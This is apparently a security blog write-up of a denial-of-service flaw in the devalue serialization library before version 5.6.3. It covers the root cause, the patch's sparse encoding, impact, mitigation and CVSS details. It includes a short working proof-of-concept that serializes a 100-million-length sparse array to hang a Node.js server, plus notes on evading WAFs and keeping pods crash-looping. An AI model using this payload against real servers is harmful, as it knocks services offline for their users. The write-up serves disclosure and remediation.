Feb 20, 2026·6 min read·3 visits
Versions of `devalue` prior to 5.6.3 iterate linearly over sparse arrays during serialization. An attacker can define an array with a length of 100 million containing a single item, causing the server to hang while generating a massive string of hole sentinels. The fix introduces a cost-based heuristic to switch to a 'sparse' encoding format when efficient.
A critical algorithmic complexity vulnerability in the `devalue` library, a staple of the Svelte ecosystem, allows attackers to trigger Denial of Service (DoS) via memory exhaustion. By supplying specially crafted sparse arrays—arrays with massive lengths but few actual elements—attackers can force the serialization engine into an O(L) operation (where L is length) rather than O(N) (where N is elements). This results in the server attempting to allocate gigabytes of memory to represent 'empty' space.
In the world of Server-Side Rendering (SSR), data serialization is the bridge between the server's brain and the client's browser. You calculate the state on the backend, freeze it into a string, ship it over the wire, and rehydrate it on the frontend. Svelte (and SvelteKit) relies heavily on a library called devalue for this task. Unlike JSON.stringify, devalue is smart—it handles circular references, undefined, Map, Set, and BigInt.
But sometimes, trying to be too smart makes you stupid. The vulnerability we're looking at today isn't about malicious code injection or prototype pollution. It's about nothing. Literally.
JavaScript arrays are weird. You can have an array with a length of a billion, but only one actual value at index 0. This is a "sparse array." To the runtime, it's just an object with a length property and a few keys. But if you try to iterate over it like a dense list, you're going to have a bad time. devalue walked right into this trap, treating the void as something that needed to be exhaustively cataloged.
The root cause is a classic algorithmic complexity error: confusing array.length with the amount of data present. Prior to version 5.6.3, devalue utilized a standard linear loop to process arrays. Whether the array was dense ([1, 2, 3]) or sparse ([1, <99 empty>, 2]), the logic remained the same.
Here is the logic flaw in pseudocode:
// The naive approach
for (let i = 0; i < array.length; i++) {
if (i in array) {
serialize(array[i]);
} else {
// Write a "hole" sentinel
output.push(HOLE);
}
}See the problem? If array.length is 100,000,000, the loop runs 100 million times. It doesn't matter if the array is empty; the loop condition checks the length, not the keys. In devalue, the HOLE constant (represented as -2 in the serialized output) serves as a placeholder for these empty spots.
So, if an attacker sends a payload containing const arr = []; arr[1e8] = 1;, devalue attempts to generate an internal array containing 99,999,999 -2 integers. This explodes memory usage instantly, turning a 1-byte payload into a multi-gigabyte allocation on the heap.
The patch provided in commit 819f1ac7475ab37547645cfb09bf2f678a799cf0 is a masterclass in defensive coding for serialization. The maintainers didn't just cap the array length; they implemented a cost-based heuristic to determine the most efficient way to represent the data.
The fix introduces a new concept: SPARSE encoding (sentinel -7). Instead of writing out every hole, the serializer now calculates two costs:
Let's look at the logic introduced in stringify.js:
// New heuristic in stringify.js
let dense_cost = 0;
let sparse_cost = 0;
for (const index in value) { // Iterates ONLY keys, not length!
// Calculate cost of values...
}
// Calculate cost of holes for dense representation
dense_cost += (value.length - keys.length) * 3; // 3 chars for holes like ",,,"
if (sparse_cost < dense_cost) {
// Switch to SPARSE mode
str = `[${SPARSE},${value.length},${encoded_sparse_values}]`;
} else {
// Use standard dense mode
}This is brilliant. It uses for (const index in value) to iterate only the populated keys. If the array is mostly empty, sparse_cost wins, and the output becomes a compact list of indices and values: [-7, 100000000, 0, "my_value"]. No billion-iteration loop, no memory explosion.
Exploiting this is trivially easy and requires zero authentication if the target application exposes an endpoint that accepts JSON (or other structures) and renders it via SSR. While JSON.parse creates dense arrays usually, an attacker might bypass this if the input is processed or generated dynamically, or if the system uses devalue to serialize internal state that can be manipulated by user input (like session data or cart items).
Here is a Proof of Concept (PoC) that demonstrates the hang:
const devalue = require('devalue');
// 1. Create a "bomb"
// A sparse array with a massive length but only one element.
const sparseBomb = [];
sparseBomb[99999999] = 'Goodbye Memory';
console.log("[+] Detonating sparse array bomb...");
console.time("Explosion Duration");
try {
// 2. Trigger the vulnerability
// This will try to allocate ~300MB+ for the string builder array immediately,
// then iterate 100 million times.
const serialized = devalue.stringify(sparseBomb);
console.log("Serialized length: " + serialized.length);
} catch (e) {
console.log("[!] Crash confirmed: " + e.message);
}
console.timeEnd("Explosion Duration");On a standard single-threaded Node.js server, this operation blocks the event loop completely. CPU usage spikes to 100%, and the Garbage Collector (GC) goes into a panic spiral trying to reclaim memory, eventually leading to a process crash or a frozen server that stops responding to health checks.
The impact here is a high-reliability Denial of Service (DoS). Because Node.js is single-threaded, a CPU-bound loop like this doesn't just slow down the request that caused it—it stops the entire server from processing any requests.
In a Kubernetes environment, the liveness probe will fail, causing the pod to restart. If the attacker simply sends this payload continuously (or in a loop), they can keep the pods in a perpetual state of crashing and restarting (CrashLoopBackOff).
Why is this juicy?
It typically bypasses standard WAF rules. WAFs look for SQL injection (' OR 1=1), XSS (<script>), or command injection (|| whoami). They rarely inspect the length property of a JSON array or the semantic "sparseness" of a data structure. It's a logic bomb that looks like valid data.
The mitigation is straightforward: upgrade devalue immediately.
Remediation Steps:
package-lock.json or yarn.lock for devalue.npm update devalue or yarn upgrade devalue.If you cannot upgrade immediately, you must validate input arrays before they reach the serialization step. Specifically, reject arrays where array.length is significantly larger than Object.keys(array).length (a high sparseness factor), or simply enforce a hard limit on array.length for any user-controlled data.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
devalue sveltejs | < 5.6.3 | 5.6.3 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Algorithmic Complexity / Resource Exhaustion |
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS | 7.5 (High) |
| Attack Vector | Network (Remote) |
| Affected Component | devalue.stringify, devalue.uneval |
| Fix Commit | 819f1ac7475ab37547645cfb09bf2f678a799cf0 |
The software does not properly control the allocation of resources, allowing an attacker to cause a Denial of Service by exhausting available memory or CPU.